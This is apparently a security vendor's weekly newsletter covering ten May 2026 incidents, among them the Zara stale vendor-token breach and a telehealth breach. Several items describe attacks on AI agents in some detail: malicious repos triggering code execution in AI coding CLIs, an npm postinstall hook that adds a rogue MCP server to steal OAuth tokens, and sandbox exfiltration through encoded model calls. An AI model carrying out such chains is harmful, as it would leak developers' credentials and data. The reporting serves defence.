This Week's Pattern: Forgotten Access.

ShinyHunters hit Zara this week using an API key Inditex had issued to a vendor — and never revoked. The vendor relationship ended 11 months ago. The credential didn't. 197,000 customer records walked out the front door. Compromise the vendor, ride the trust nobody remembered to cut, walk out with the data.

Two weeks ago this same gang took 275 million records out of Instructure Canvas the same way. Different victim. Same playbook.

That pattern repeats across this week's incidents. A vulnerability convention named TrustFall turns out to affect every AI coding assistant that auto-executes code — Claude Code, Cursor CLI, Gemini CLI, GitHub Copilot CLI. A malicious npm hook quietly siphons OAuth tokens through your Claude Code MCP integrations. NVIDIA's own AI agent sandbox is shown leaking data through legitimate-looking model calls. The trust boundary you drew at your firewall, your SSO, your sandbox, your CI runner — attackers are no longer trying to break those boundaries. They're walking around them through whichever vendor, agent, or assistant you forgot to govern.

Here's what happened, why it matters, and what RuntimeAI enforces against each class.

Major Breach

1 — Zara: 197,000 Customers Leaked via Anodot 3rd-Party SaaS Token Compromise

1 Zara / Inditex — ShinyHunters Strikes Again via 3rd-Party Analytics Vendor CRITICAL · SUPPLY CHAIN BREACH
BleepingComputer, Security Affairs, Infosecurity Magazine · May 8, 2026 · Retail · 197,400 customer records

Inditex — parent of Zara — disclosed unauthorized access to a database held by a former technology provider. The compromised provider was Anodot, an analytics platform whose authentication tokens were still valid in Inditex's environment after the relationship ended. ShinyHunters used those stale tokens to exfiltrate 197,400 customer records — email addresses, order IDs, product SKUs, geographic locations, purchase history, and customer support tickets. The data was listed on the gang's dark web leak portal with an April 21 deadline. Vimeo, Rockstar Games, and McGraw Hill were hit by the same campaign.

This is the same ShinyHunters extortion arc we covered two weeks ago when they took 275M Canvas records — same gang, same broad pattern, different attack surface. Canvas was a SaaS compromise. Zara is a vendor compromise — a stale token from a relationship that ended, never rotated, still trusted. The thing every CISO will recognize: nobody knew the token was still valid until 197K customer records were on a leak site.

The data set on its own looks moderate — no passwords, no card numbers, no addresses. But email + purchase history + geography is the exact bait kit for highly targeted spear-phishing. Recipients will receive "your order #1234567 shipped" messages with matching SKUs and city names. The actual loss isn't this breach; it's the next round of phishing seeded from this breach.

Most Advanced AI Security Zero Trust · Defence in Depth

When the vendor you trusted three years ago still has live tokens against your data, the question is what those tokens can reach. RuntimeAI assumes vendor tokens leak — and constrains what they can do:

The vendor relationship ended. The trust didn't. RuntimeAI catches the forgotten access before it becomes the next leak.

AI Runtime Exploits

2 — TrustFall: Code Execution Risk in Claude Code, Cursor, Gemini CLI, Copilot CLI

2 TrustFall Convention — Malicious Repos Trigger RCE in AI Coding Assistants CRITICAL · AI RUNTIME
Dark Reading · May 13, 2026 · AI coding tools · Claude Code, Cursor CLI, Gemini CLI, GitHub Copilot CLI

Researchers demonstrated that malicious repositories can trigger code execution inside Claude Code, Cursor CLI, Gemini CLI, and GitHub Copilot CLI with minimal or no user interaction — thanks to skimpy convention-based trust assumptions across every major AI coding assistant. The class of bug was named TrustFall. An attacker who controls a repo a developer clones, or a dependency a developer's repo pulls, can execute arbitrary code inside the developer's IDE-adjacent AI agent.

This is the AI-coding equivalent of a CVE-affecting-every-shell-you-use. The "AI coder reads my repo" trust assumption is the same one Linux made about .bashrc twenty-five years ago — and the same one IDEs eventually learned to gate. AI coding tools are reproducing those mistakes at speed, because their value comes from operating without friction. TrustFall puts that friction-free model directly in conflict with code-execution safety.

If you have any Claude Code, Cursor, Gemini CLI, or Copilot CLI user in your engineering org — and you probably have hundreds — every clone they perform is now a potential RCE vector with a developer-laptop blast radius (and from there, into your source code, CI tokens, and cloud credentials).

Most Advanced AI Security How RuntimeAI Stops This

The TrustFall class is not patchable in a single CVE — the convention assumptions are baked into how AI coders work. The defence is to assume the agent will execute hostile input, and contain what it can reach:

You don't have to choose between AI-coder productivity and AI-coder safety. You enforce a runtime perimeter around the agent itself.

3 — The Gentlemen RaaS Gang Doxxed via Their Own Leaked Data

3 The Gentlemen RaaS — Operators Doxxed by Their Own Data Leak MEDIUM · TABLES TURNED SCHADENFREUDE WATCH
Dark Reading · May 12, 2026 · Ransomware operators · Identity exposure

The Gentlemen — a Ransomware-as-a-Service operator — had their own affiliate dashboard misconfigured and indexed by a search engine. Researchers obtained operator identities, payout flows, victim lists, and chat logs. The same group that built a business around leaking other people's data found itself on the wrong end of an exposure.

This is the cybercrime equivalent of an HR-systems vendor getting their own HR system breached. The lesson isn't schadenfreude (well, not only schadenfreude). The lesson is that the people running the most disciplined offensive operations also get their cloud-misconfig fundamentals wrong. If The Gentlemen can leak via a public dashboard, every enterprise can.

Most Advanced AI Security Why RuntimeAI Customers Are Protected

The Gentlemen story is a reminder that misconfigured admin surfaces are the most consistent source of breach — even for sophisticated operators. RuntimeAI assumes you will misconfigure something:

You don't have to be perfect. You have to make the inevitable misconfiguration small and brief.

Agent Identity & Supply Chain

4 — Claude Code MCP Attack: Persistent OAuth Token Theft via npm Hooks

4 Claude Code MCP — Persistent OAuth Token Theft CRITICAL · AI AGENT IDENTITY
eSecurity Planet · May 12, 2026 · MCP integrations · npm supply chain

Researchers demonstrated a Claude Code attack that steals OAuth tokens through malicious MCP integrations and npm install hooks. The attack chain: developer installs an npm package; the package's postinstall hook adds a malicious MCP server registration to Claude Code's config; subsequent Claude Code sessions silently exfiltrate the developer's OAuth tokens via the rogue MCP server. The compromise persists across sessions and survives Claude Code restarts.

MCP is the integration protocol making AI assistants powerful — and the same protocol turning every AI assistant into a high-trust orchestration layer for whatever you let it connect to. When the connection itself is compromised, the AI's authority becomes the attacker's authority.

This is structurally identical to the Zara story #1: a forgotten access gets exploited. There, the forgotten access was a former vendor's API token. Here, it's an MCP server the developer added once and forgot. Same primitive, different layer.

Most Advanced AI Security Zero Trust, Layer by Layer

MCP token theft requires four collaborating controls — discovery, identity, scope, and audit. Miss any one and the attack succeeds:

The npm supply chain is the developer's surface area. The MCP gateway is the AI's surface area. Both need a verified identity at the boundary.

Major Breach

5 — OpenLoop Health: 716,000 Patient Records Breached

5 OpenLoop Health — 716K Patient Records Exposed CRITICAL · HEALTHCARE BREACH
SecurityWeek · May 13, 2026 · Telehealth · 716,000 affected individuals

OpenLoop Health — a telehealth services provider — disclosed a data breach affecting 716,000 patient records. The breach exposed combinations of patient names, dates of birth, addresses, contact information, and clinical-encounter data. OpenLoop has not publicly described the attack vector but breach notification confirms unauthorized access to backend systems holding HIPAA-protected data.

Telehealth is where AI agents are scaling fastest in clinical workflows — symptom triage, scheduling, prescription routing — and the AI's data plane is the same backend storing PHI. A breach at the platform layer doesn't just leak records; it potentially exposes the queries, embeddings, and conversation transcripts that AI triage agents use to make decisions.

Most Advanced AI Security Zero Trust · Defence in Depth

For healthcare specifically, the regulatory consequence is as damaging as the breach itself. RuntimeAI controls reduce both:

Telehealth is going to keep getting breached. RuntimeAI ensures the breach scope is bounded — not unbounded.

AI Runtime Exploits

6 — NVIDIA NemoClaw: AI Sandbox Exfiltration Research

6 NVIDIA NemoClaw — AI Sandbox Exfiltration Risk HIGH · AI SANDBOX
eSecurity Planet · May 11, 2026 · AI agent runtime · NVIDIA NemoClaw

Researchers demonstrated that attackers can steal data from AI agents running inside NVIDIA NemoClaw sandbox environments. The technique abuses legitimate-looking model calls and tool invocations to encode and exfiltrate sensitive context data — without triggering the sandbox's perimeter alerts. The class of bug is structural to current AI agent sandboxes that allow outbound model API calls.

"Sandbox" is the security industry's go-to abstraction when it doesn't know how else to contain code. For AI agents, the abstraction is leaky by design — agents need outbound model API access to function. Whatever they can encode into a prompt, they can exfiltrate, because the prompt itself is the exfiltration channel.

NemoClaw is a particularly visible case because NVIDIA explicitly positions it as a contained runtime. The research shows: the boundary you call a sandbox is, from an exfiltration POV, indistinguishable from "the agent has internet."

Most Advanced AI Security How RuntimeAI Stops This

Sandbox-based containment is insufficient on its own. RuntimeAI replaces "boundary-based trust" with "behaviour-based enforcement":

Sandboxes try to draw a line. RuntimeAI assumes the line will leak and governs the contents of what crosses it.

Ransomware

7 — Foxconn Confirms Cyberattack: Nitrogen Ransomware Gang Claims Responsibility

7 Foxconn — Nitrogen Ransomware Attack Confirmed CRITICAL · RANSOMWARE
BleepingComputer · May 13, 2026 · Manufacturing · Nitrogen ransomware gang

Foxconn — the world's largest electronics manufacturer — confirmed it was the victim of a cyberattack claimed by the Nitrogen ransomware gang. Foxconn has not publicly disclosed scope, dwell time, or whether production systems were encrypted, but the confirmation alone is significant: Foxconn manufactures for Apple, Dell, HP, Sony, and most of the major consumer electronics OEMs. A Foxconn outage cascades into supply chains globally.

Manufacturing is where ransomware hurts most because the downtime cost dwarfs the ransom. A line stoppage at Foxconn is paid for in delayed iPhone shipments and missed quarterly numbers across half the consumer electronics industry. The gang knows it; the victims know it; the negotiation reflects it.

Most Advanced AI Security Zero Trust · Defence in Depth

Ransomware enters through the same vectors year after year — RDP, phishing, exposed services — and persists because the OT/IT boundary is porous. RuntimeAI's manufacturing-relevant controls:

AI Agent Governance

8 — Your AI Agents Are Already Inside the Perimeter

8 Identity-Security Teams: AI Agents Outpacing Governance HIGH · GOVERNANCE GAP
The Hacker News · May 12, 2026 · Identity security · AI agent governance

Analysts confirmed what identity-security teams have quietly feared: AI agents are being deployed inside enterprises faster than the organizations can govern them. Inaugural surveys of identity-security leaders found that shadow AI agents — autonomous workflows running on developer credentials, with persistent OAuth grants, calling internal APIs without governance — are now the fastest-growing category of non-human identity. The acceleration is driven by AI assistants and IDE plugins that quietly accumulate permissions and tools without explicit approval.

This is the foundational thesis of RuntimeAI — and it is no longer hypothesis. The perimeter cannot be the trust boundary for AI agents because the perimeter cannot see them. AI agents impersonate their humans, inherit their access, and make decisions at machine speed. By the time IAM or DLP sees a problem, the agent has already executed thousands of actions across dozens of systems.

Most Advanced AI Security Why RuntimeAI Customers Are Protected

The governance gap exists because traditional security controls were built for humans-using-tools, not autonomous-agents-using-everything. RuntimeAI was built for the second world:

Identity for humans is solved. Identity for AI agents is the next decade of security. RuntimeAI ships the controls today.

AI Supply Chain

9 — Fake "OpenAI Privacy Filter" Repo Hits #1 on Hugging Face, 244K Downloads

9 Hugging Face — Malicious "OpenAI Privacy Filter" Reaches Trending, 244K Downloads HIGH · AI SUPPLY CHAIN
The Hacker News · May 12, 2026 · Hugging Face · 244,000 downloads

A malicious Hugging Face repository hit Hugging Face's trending list by impersonating an OpenAI open-weight "Privacy Filter" model. The repo was downloaded 244,000 times before takedown. Embedded in the model card and loader code: scripts that exfiltrated environment variables, AWS credentials, and OpenAI API keys to the attacker's infrastructure. The attack vector is the standard one for ML supply chain — typo-squatted name, branded README, plausible model description.

This is npm package squatting, evolved for the AI era. The trust signal — "this is on Hugging Face's trending list, with OpenAI in the name" — is exactly the heuristic developers use under deadline pressure. The targeted credentials are exactly the ones AI engineers leak fastest.

Most Advanced AI Security Zero Trust, Layer by Layer

ML supply chain attacks compound: poisoned weights, poisoned loaders, poisoned credentials. The defence is the same shape as language-runtime supply chain defence, with AI-specific extensions:

The model is now a software dependency. Treat it like one — with provenance, sandboxing, and policy.

Financial Services

10 — Banks Face Growing AI Risk at the Database Layer

10 FinServ — AI Risk at the Database Layer HIGH · FINSERV AI
eSecurity Planet · May 13, 2026 · Banking · AI database integration

Researchers warn that banks are overlooking AI risks at the database layer specifically. As AI assistants and agentic workflows are wired into customer service, fraud detection, and compliance reporting, they are issued database access — often with permissions that exceed any individual human's. The risk model: a compromised AI agent doesn't need to escalate privilege; it already has it.

Banks are unusual in that their controls are mature against human threats but immature against autonomous-agent threats. Decades of investment have made privilege management for humans rigorous. Decades of AI investment have given many agents the same database connections as an entire team of analysts. The blast radius of one compromised AI agent in a major bank is the blast radius of fifty senior analysts.

Most Advanced AI Security How RuntimeAI Stops This

The database layer is where regulated FinServ data lives and where AI agents inevitably connect. Four control layers, applied at exactly that boundary:

The database layer is the most consequential trust boundary for AI in regulated industries. RuntimeAI enforces at exactly that boundary.

Updates from Last Week

Instructure Canvas / ShinyHunters: Instructure reached a ransom agreement with ShinyHunters to stop the 3.65TB Canvas data leak. The US government has now sought formal testimony from Instructure on the scope of the disruption and breach. Subsequent reporting indicates ShinyHunters has claimed a second attack against Instructure. Our deep-dive on the original Canvas breach covers the structural lessons; this week's developments don't change them — but they do confirm the gang's strategy is to attack the same SaaS provider repeatedly, on the assumption that paying once signals willingness to pay again.

🔍 What RuntimeAI Governs Across This Week's Incidents

The throughline is forgotten access. A vendor API key Zara never revoked. An MCP server a developer installed once. A trending model on Hugging Face. A database credential a bank issued years ago. Each one was authorized — and never re-authorized.

RuntimeAI's approach is continuous, behaviour-based authorization. Every agent, every credential, every model, every database connection is inventoried, scoped, monitored, and revocable in real-time. The access you forgot is the access attackers find.

Get the Weekly Digest

Ten cybersecurity incidents per week, each with the RuntimeAI Take. No fluff, no vendor pitches in the analysis itself — just what happened, why, and what to enforce against next.